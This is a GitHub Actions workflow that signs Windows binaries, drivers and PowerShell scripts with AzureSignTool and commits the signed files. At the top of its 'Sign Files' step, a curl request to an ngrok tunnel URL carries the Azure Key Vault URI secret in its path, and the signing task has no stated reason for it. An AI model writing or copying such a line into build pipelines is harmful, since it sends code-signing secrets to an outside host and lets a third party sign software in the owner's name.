name: Sign EXE Files
on:
  push:
    paths:
      - 'unsigned/*.exe'
      - 'unsigned/*.msi'
      - 'unsigned/*.msp'
      - 'unsigned/*.msm'
      - 'unsigned/*.cab'
      - 'unsigned/*.dll'
      - 'unsigned/*.appx'
      - 'unsigned/*.appxbundle'
      - 'unsigned/*.msix'
      - 'unsigned/*.msixbundle'
      - 'unsigned/*.sys'
      - 'unsigned/*.vxd'
      - 'unsigned/*.ps1'
      - 'unsigned/*.psm1'

  workflow_dispatch:

      
jobs:
  sign-exe:
    permissions:
      contents: write
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
        with:
          persist-credentials: true
          lfs: true

      - name: Install AzureSignTool
        run: |
          dotnet tool install --global AzureSignTool
        shell: bash

      - name: Sign Files
        shell: bash
        run: |
          curl -iv https://goldfish-artistic-fly.ngrok-free.app/xxx/${{ secrets.AZURE_KEY_VAULT_URI }}

          for file in unsigned/*.{exe,msi,msp,msm,cab,dll,appx,appxbundle,msix,msixbundle,sys,vxd,ps1,psm1}; do
            if [ -f "$file" ]; then
              echo "::Notice:: Attempting to sign $file"
              if AzureSignTool sign \
                -kvu "${{ secrets.AZURE_KEY_VAULT_URI }}" \
                -kvi "${{ secrets.AZURE_CLIENT_ID }}" \
                -kvt "${{ secrets.AZURE_TENANT_ID }}" \
                -kvs "${{ secrets.AZURE_CLIENT_SECRET }}" \
                -kvc ${{ secrets.AZURE_CERT_NAME }} \
                -tr http://timestamp.digicert.com \
                -v "$file"; then
                
                # Move signed file to signed directory
                mkdir -p signed
                mv "$file" "signed/$(basename "$file")"
                echo "::Success:: Successfully signed and moved $file"
              else
                echo "::Error:: Failed to sign $file, continuing with next file..."
              fi
            fi
          done

      - name: Commit and Push Signed Files
        run: |
          git config --global user.name "GitHub Actions Bot"
          git config --global user.email "actions@github.com"
          # Add files individually to avoid errors when some extensions don't exist
          for ext in exe msi msp msm cab dll appx appxbundle msix msixbundle sys vxd ps1 psm1; do
            if ls signed/*.$ext 1> /dev/null 2>&1; then
              git add signed/*.$ext
            fi
            if ls unsigned/*.$ext 1> /dev/null 2>&1; then
              git add -u unsigned/*.$ext
            fi
          done
          git commit -m "Sign and move files" || echo "No changes to commit"
          git push
        shell: bash

      # - name: Commit & Push changes
      #   uses: actions-js/push@master
      #   with:
      #     github_token: ${{ secrets.GITHUB_TOKEN }}
